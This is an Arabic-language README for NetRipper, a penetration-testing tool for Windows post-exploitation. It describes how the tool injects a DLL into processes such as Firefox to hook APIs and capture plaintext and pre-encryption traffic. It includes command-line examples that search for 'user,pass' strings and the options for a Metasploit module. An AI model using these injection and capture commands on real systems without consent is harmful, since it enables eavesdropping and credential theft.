
NetRipper - التقاط حركة المرور الذكي لمختبرو الاختراق
NetRipper هي أداة استغلال لاحق تستهدف أنظمة Windows وتستخدم ربط واجهات برمجة التطبيقات (API hooking) لاعتراض حركة مرور الشبكة والوظائف المتعلقة بالتشفير من مستخدم منخفض الصلاحيات، مما يمكنها من التقاط كل من حركة المرور النصية الصريحة وحركة المرور المشفرة قبل التشفير/بعد فك التشفير.
تم إصدار NetRipper في Defcon 23، لاس فيغاس، نيفادا.
استخدام NetRipper لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. يتحمل المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج!
يمكن أن تكون أنشطة ما بعد الاستغلال في اختبار الاختراق صعبة إذا كان المختبِر يتمتع بصلاحيات منخفضة على جهاز Windows محدث بالكامل ومُهيأ بشكل جيد. يقدم هذا العمل تقنية لمساعدة المختبِر في العثور على معلومات مفيدة عن طريق التنصت على حركة مرور الشبكة للتطبيقات على الجهاز المخترق، على الرغم من صلاحياته المنخفضة. علاوة على ذلك، يتم أيضًا التقاط حركة المرور المشفرة قبل إرسالها إلى طبقة التشفير، وبالتالي يمكن التنصت على كل حركة المرور (النص الصريح والمشفر). تنفيذ هذه التقنية هو أداة تسمى NetRipper تستخدم ربط واجهات برمجة التطبيقات (API hooking) للقيام بالإجراءات المذكورة أعلاه والتي تم تصميمها خصيصًا لاستخدامها في اختبارات الاختراق، ولكن يمكن أيضًا استخدام المفهوم لمراقبة حركة مرور الشبكة للموظفين أو لتحليل تطبيق ضار.
يجب أن يكون NetRipper قادرًا على التقاط حركة مرور الشبكة من: Putty، WinSCP، SQL Server Management Studio، Microsoft Outlook، Google Chrome، Mozilla Firefox والعديد من الأدوات الأخرى. القائمة لا تقتصر على هذه التطبيقات ولكن الأدوات الأخرى قد تتطلب دعمًا خاصًا.
NetRipper.exe - Configures and inject the DLL
DLL.dll - Injected DLL, hook APIs and save data to files
netripper.rb - Metasploit post-exploitation module
يتوفر بناء تلقائي على AppVeyor. يمكن تنزيل الثنائيات من قسم Artifacts هنا.
Injection: NetRipper.exe DLLpath.dll processname.exe
Example: NetRipper.exe DLL.dll firefox.exe
Generate DLL:
-h, --help Print this help message
-w, --write Full path for the DLL to write the configuration data
-l, --location Full path where to save data files (default TEMP)
Plugins:
-p, --plaintext Capture only plain-text data. E.g. true
-d, --datalimit Limit capture size per request. E.g. 4096
-s, --stringfinder Find specific strings. E.g. user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options
Module options (post/windows/gather/netripper/netripper):
Name Current Setting Required Description
---- --------------- -------- -----------
DATALIMIT 65535 no The number of bytes to save from requests/responses
DATAPATH TEMP no Where to save files. E.g. C:\Windows\Temp or TEMP
DLLPATH no Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
PLAINTEXT false no True to save only plain-text data
PROCESSIDS no Process IDs. E.g. 1244,1256
PROCESSNAMES no Process names. E.g. firefox.exe,chrome.exe
SESSION yes The session to run this module on.
STRINGFINDER DEFAULT no Search for specific strings in captured data
قم بتعيين PROCESSNAMES أو PROCESSIDS وشغّل.
@HarmJ0y أضاف تنفيذ PowerShell Invoke-NetRipper.ps1 لأداة NetRipper.exe يرجى ملاحظة أن وحدة PowerShell ليست محدثة.
يمكنك العثور على سجل التغييرات في ملف "Changelog.md" وتعليمات الترجمة في ملف "Compilation.md".
يستخدم NetRipper
Ionut Popescu (@NytroRST)